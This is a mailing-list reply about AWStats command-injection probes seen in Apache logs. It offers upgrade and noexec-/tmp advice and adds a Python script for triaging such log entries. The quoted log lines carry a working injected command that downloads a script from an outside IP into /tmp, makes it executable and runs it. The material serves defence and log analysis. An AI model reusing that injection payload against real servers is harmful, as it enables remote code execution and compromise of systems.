Michael Mansour wrote:
220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
...
Are there any updates FL can do to any of the packages to fix/block
slapper from an FC1 machine?

You might also want to make sure you're using a current version of
AWStats.  IIRC this flaw was fixed in either 6.3 or 6.4, and the current
version is 6.5.

(If you don't have awstats.pl on your system, then these lines are just probes and aren't relevant to your problem.)

More generally, I read advice somewhere that mounting /tmp with the "noexec" option (and making any other temp directories symbolic links to that one) can make this type of attack much more difficult.

--
Kelson Vibber
SpeedGate Communications <www.speed.net>

--
fedora-legacy-list mailing list
fedora-legacy-list@redhat.com
https://www.redhat.com/mailman/listinfo/fedora-legacy-list
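
A way to triage access-log entries like the ones quoted in this thread, added here as an example and not part of the original messages: it decodes the configdir parameter of awstats.pl requests, flags shell metacharacters, and separates requests the server refused or could not find from ones it served. The function names, the reading of the status codes and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, unquote

# Apache combined log: host ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (.*?) HTTP/[\d.]+" (\d{3}) ')
SHELL_META = set("|;`$&<>")  # characters with no place in a directory name

def verdict(status):
    # Assumed reading of the status code; adjust to the local server setup.
    if status == 404:
        return "script-not-present"
    if status == 403:
        return "denied"
    return "served-investigate" if 200 <= status < 300 else "other"

def classify(line):
    """Return a finding for an awstats.pl request whose decoded configdir
    value contains shell metacharacters, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, when, target, status = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/awstats.pl"):
        return None
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        # Decode before matching so %7C is caught as well as a literal pipe.
        if name.lower() == "configdir" and SHELL_META & set(unquote(raw)):
            return {"host": host, "time": when, "path": parts.path,
                    "status": int(status), "verdict": verdict(int(status))}
    return None

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (documentation addresses, harmless payload).
SAMPLE = [
    '192.0.2.10 - - [23/Jan/2006:08:33:02 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20TEST;echo| HTTP/1.1" 403 344 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20TEST;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [23/Jan/2006:09:10:00 +1100] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [23/Jan/2006:09:12:00 +1100] "GET /cgi-bin/awstats.pl?config=x&configdir=%7Cecho%7C HTTP/1.1" 200 812 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["time"], f["host"], f["path"], f["status"], f["verdict"])
```

Only the "served-investigate" entries call for checking the installed AWStats version and the host itself; 403 and 404 entries show the request never reached a working awstats.pl.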
